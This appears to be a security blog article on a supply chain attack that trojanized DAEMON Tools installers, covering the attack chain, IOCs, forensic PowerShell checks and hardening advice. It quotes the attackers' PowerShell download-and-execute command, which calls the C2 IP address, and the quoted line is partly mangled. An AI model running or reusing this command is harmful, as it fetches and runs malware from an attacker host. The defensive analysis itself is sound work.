URGENT: DAEMON Tools Supply Chain Attack—Check Your PC NOW (Over 100 Countries HIT) + Video

By /

Listen to this Post

Featured Image

Introduction

In early May 2026, Kaspersky’s Global Research and Analysis Team (GReAT) identified an active supply chain attack compromising the official installers of DAEMON Tools—a widely used disk emulation utility. This highly sophisticated compromise, which began on April 8, 2026, allowed attackers to distribute trojanized, digitally signed software directly from the vendor’s legitimate website for nearly a full month. The attack bypasses traditional perimeter defenses by abusing implicit user trust in signed, official downloads, and has resulted in thousands of infection attempts across more than 100 countries, with targeted follow-up activity observed against government, scientific, manufacturing, and retail sectors in Russia, Belarus, and Thailand.

Learning Objectives

  • Understand the technical details of the multi-stage DAEMON Tools supply chain compromise and the three trojanized binaries.
  • Identify Indicators of Compromise (IOCs) and conduct system audits to detect the presence of the backdoor and QUIC RAT.
  • Execute containment, eradication, and recovery procedures in both Windows and mixed-OS environments.

You Should Know

  1. Anatomy of the Compromise: From Signed Installer to QUIC RAT

The attackers successfully compromised DAEMON Tools versions 12.5.0.2421 through 12.5.0.2434, planting malicious code into three core binaries within the installation directory: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe.
Because disk emulation software needs low‑level system access, users typically grant it administrative privileges, giving the embedded malware a deep, persistent foothold. The tampered files remained signed with AVB Disc Soft’s valid digital certificate, making them appear completely legitimate.

Step‑by‑step attack chain:

  1. Initial Execution – Upon machine startup, the compromised binary runs and activates a backdoor embedded in the C Runtime (CRT) initialization code.
  2. C2 Communication – The backdoor sends HTTP GET requests to a typosquatted C2 domain, `env-check.daemontools[.]cc` (registered on March 27, 2026).
  3. First-Stage Payload – The C2 server replies with a shell command to download and execute an information collector (envchk.exe). The observed command template is: 
    cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/','C:\Windows\Temp.exe')"&& %TEMP%\ &&del %TEMP%.exe

  4. System Profiling – This .NET executable (SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4) collects extensive system data, including MAC addresses, hostnames, DNS domain names, running processes, and system locales.

  5. Targeted Post‑Compromise – Attackers manually reviewed the vast amount of profiling data to select only about a dozen high‑value machines for further exploitation. These received a minimalistic backdoor via a shellcode loader that uses RC4 encryption to execute payloads directly in memory.

  6. QUIC RAT Deployment – On the most valuable targets (notably a Russian educational institution), attackers deployed QUIC RAT, a sophisticated C++ backdoor statically linked with the WolfSSL library. It supports HTTP/3 and QUIC protocols and injects malicious code into `notepad.exe` and `conhost.exe` to evade detection.

2. Detecting and Investigating the Breach (Windows Forensics)

After identifying potentially compromised hosts, security teams must conduct a thorough forensic investigation to determine the scope and impact.

Step‑by‑step investigation guide (Windows):

  1. Inventory DAEMON Tools Installations – Run the following PowerShell command against your environment to find all machines with the vulnerable software installed:
Get-WmiObject -Class Win32_Product | Where-Object {$_.Name -like "DAEMON Tools"} | Select-Object PSComputerName, Name, Version
  1. Check for Compromised Binaries – Review the digital signature details and hash values of the three key files:
Get-AuthenticodeSignature -FilePath "C:\Program Files\DAEMON Tools Lite\DTHelper.exe"
Get-FileHash "C:\Program Files\DAEMON Tools Lite\DTHelper.exe" -Algorithm SHA256
  1. Search for Information Collector (envchk.exe) – Use a combination of PowerShell and command-line tools to search for the known malicious executable:
dir /s envchk.exe
wmic process where "name='envchk.exe'" get processid,executablepath
  1. Analyze Network Connections – Search for connections to the typosquatted domain and the known IP address using `netsh` or PowerShell:
Get-NetTCPConnection | Where-Object {$<em>.RemoteAddress -eq "38.180.107.76"}
Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | Where-Object { $</em>.Message -like "env-check.daemontools[.]cc" }
  1. Collect Relevant Evidence – For deeper analysis, collect the following artifacts and send them to a sandbox for further examination:

Compromised installers (version 12.5.0.2421–2434)

`envchk.exe` if found on disk

Suspicious PowerShell logs (Event ID 4104)

Network traffic captures containing connections to the C2 infrastructure

  1. Building Resilience: Proactive Hardening for Linux, Windows, and Cloud

Organizations must treat this event as a case study and implement controls to mitigate future supply chain attacks, regardless of operating system.

Step‑by‑step proactive hardening:

  1. Restrict PowerShell Execution (Windows) – Set PowerShell execution policy to `Restricted` or use AppLocker to control script execution:
Set-ExecutionPolicy Restricted -Scope LocalMachine
  1. Monitor Linux Binary Integrity – Use `AIDE` (Advanced Intrusion Detection Environment) to baseline critical system binaries and detect unauthorized changes:
sudo aideinit
sudo aide --check
  1. Implement DNS Filtering – Block known malicious domains at the DNS level. Add the following entries to your DNS sinkhole or firewall:
env-check.daemontools[.]cc
38.180.107[.]76
  1. Adopt Software Bill of Materials (SBOM) – Generate and maintain an SBOM for all third-party software to track dependencies and versions, making it easier to identify vulnerable components.

  2. Enforce Least Privilege – Do not run everyday software with administrative privileges. Use standard user accounts and implement just-in-time (JIT) privilege elevation mechanisms.

  3. Harden Build Pipelines (DevOps) – For organizations that develop software, protect signing keys using hardware security modules (HSMs) and implement multi‑party authorization for build and release processes.

What Undercode Say

  • Supply chain attacks are now the most prevalent threat. With nearly 19,500 malicious packages detected in open-source projects by the end of 2025 (a 37% year-over-year increase), relying on vendor reputation is no longer sufficient.

  • Digital signatures are not a guarantee of safety. The DAEMON Tools incident proves that valid code-signing certificates, once stolen or misused, can lull users and security tools into a false sense of security. Executable signing must be complemented with behavioral analysis.

  • Targeted post-compromise activity is efficient and dangerous. The attackers’ ability to manually sift through thousands of infections to deploy secondary payloads on a dozen specific machines demonstrates a surgical, intelligence-driven approach that maximizes impact while minimizing exposure.

Prediction

This attack heralds a new normal for software supply chain breaches. Threat actors will increasingly target widely distributed, system‑level utilities (disk emulators, VPN clients, and development tools) because their privileged access requirements provide immediate, deep‑level compromise. We will likely see a rise in “signature‑based” attacks that abuse stolen or compromised digital certificates to bypass traditional antivirus and endpoint detection. Consequently, the industry will pivot toward immutable infrastructure, zero‑trust software distribution (e.g., using The Update Framework, TUF), and runtime behavioral monitoring. Within 12–18 months, major operating systems and software vendors may implement mandatory SBOM attestation and runtime code integrity verification, making it significantly harder for attackers to weaponize trusted software at scale.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Cybersecuritynews Malware – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: